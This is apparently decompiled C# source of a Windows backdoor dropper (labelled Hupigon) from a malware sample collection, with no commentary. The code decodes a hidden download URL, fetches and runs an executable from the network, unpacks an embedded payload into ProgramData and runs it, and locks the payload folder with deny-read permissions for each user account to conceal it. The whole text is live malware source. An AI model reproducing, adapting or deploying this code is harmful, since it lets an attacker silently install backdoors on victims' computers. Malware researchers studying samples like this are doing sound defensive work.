// Decompiled with JetBrains decompiler
// Type: X
// Assembly: 12, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 02FFA771-B60F-49F4-BE51-37E50E40AF6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.Hupigon.mrzd-97a335ad9a7d65429e8d9aedeaa1dd6b93990dd399d43ca43d8ef174c0f0faee.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Collections;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Text;

internal class X
{
  [STAThread]
  public static void main()
  {
    if (AppDomain.CurrentDomain.BaseDirectory.Length < 4 | Strings.InStr(AppDomain.CurrentDomain.BaseDirectory.ToLower(), "temp") > 0)
    {
      try
      {
        WebClient webClient1 = new WebClient();
        string path = Interaction.Environ("temp") + "\\jp.exe";
        WebClient webClient2 = webClient1;
        string s = "Ahr0CdOVl2XVywrPBMCTys5SzwfKAg9ZDgvYlMnVBs90ywWUmJaXmdKYoteXmJe1nc5LEgu=";
        string address = X.DEB(ref s);
        byte[] bytes = webClient2.DownloadData(address);
        System.IO.File.WriteAllBytes(path, bytes);
        Interaction.Shell(Interaction.Environ("temp") + "\\jp.exe");
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
    byte[] bytes1 = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
    string Path = Interaction.Environ("programdata") + "\\DCSCRES_SERVERW";
    string str = Path + "\\DCSCRES_SERVERW.exe";
    try
    {
      FileSystem.MkDir(Path);
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
    try
    {
      X.BD(ref Path);
      System.IO.File.WriteAllBytes(str, bytes1);
      Interaction.Shell(str);
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
  }

  public static byte[] Z(byte[] Byt)
  {
    MemoryStream memoryStream = new MemoryStream(Byt);
    GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
    byte[] buffer = new byte[4];
    memoryStream.Position = checked (memoryStream.Length - 5L);
    memoryStream.Read(buffer, 0, 4);
    int int32 = BitConverter.ToInt32(buffer, 0);
    memoryStream.Position = 0L;
    byte[] array = new byte[checked (int32 - 1 + 1)];
    gzipStream.Read(array, 0, int32);
    gzipStream.Dispose();
    memoryStream.Dispose();
    return array;
  }

  public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(X.Lu(ref s)));

  public static string Lu(ref string text)
  {
    string str1 = "qwertyuiopasdfghjklzxcvbnm";
    string str2 = "";
    int num1 = checked (text.Length - 1);
    int index1 = 0;
    if ((MyApplication.\u002E\u002E\u002E\u002E & 1030) == 0)
      goto label_10;
label_1:
    int num2 = checked (str1.Length - 1);
    int index2 = 0;
    if ((MyApplication.\u002E\u002E\u002E\u002E & 22) == 0)
      goto label_7;
label_2:
    char ch1 = text[index1];
    char ch2;
    if ((int) ch1 == (int) str1[index2])
    {
      string str3 = str2;
      ch2 = text[index1];
      string upper = ch2.ToString().ToUpper();
      str2 = str3 + upper;
      if ((MyApplication.\u002E\u002E\u002E\u002E & 5700) == 0)
        goto label_9;
    }
    int num3 = (int) ch1;
    ch2 = str1[index2];
    int num4 = (int) Conversions.ToChar(ch2.ToString().ToUpper());
    if (num3 == num4)
    {
      str2 += text[index1].ToString().ToLower();
      if ((MyApplication.\u002E\u002E\u002E\u002E & 1538) == 0)
        goto label_9;
    }
    checked { ++index2; }
label_7:
    if (index2 > num2)
      str2 += Conversions.ToString(text[index1]);
    else
      goto label_2;
label_9:
    checked { ++index1; }
label_10:
    if (index1 > num1)
      return str2;
    goto label_1;
  }

  public static void BD(ref string Path)
  {
    DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
    IEnumerator enumerator;
    try
    {
      enumerator = accessControl1.GetAccessRules(true, true, typeof (NTAccount)).GetEnumerator();
      if ((MyApplication.\u002E\u002E\u002E\u002E & 4624) == 0)
        goto label_5;
label_2:
      FileSystemAccessRule current = (FileSystemAccessRule) enumerator.Current;
      try
      {
        DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
        FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(current.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
        accessControl2.AddAccessRule(rule);
        Directory.SetAccessControl(Path, accessControl2);
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
label_5:
      if (enumerator.MoveNext())
        goto label_2;
    }
    finally
    {
      if (enumerator is IDisposable)
        (enumerator as IDisposable).Dispose();
    }
  }
}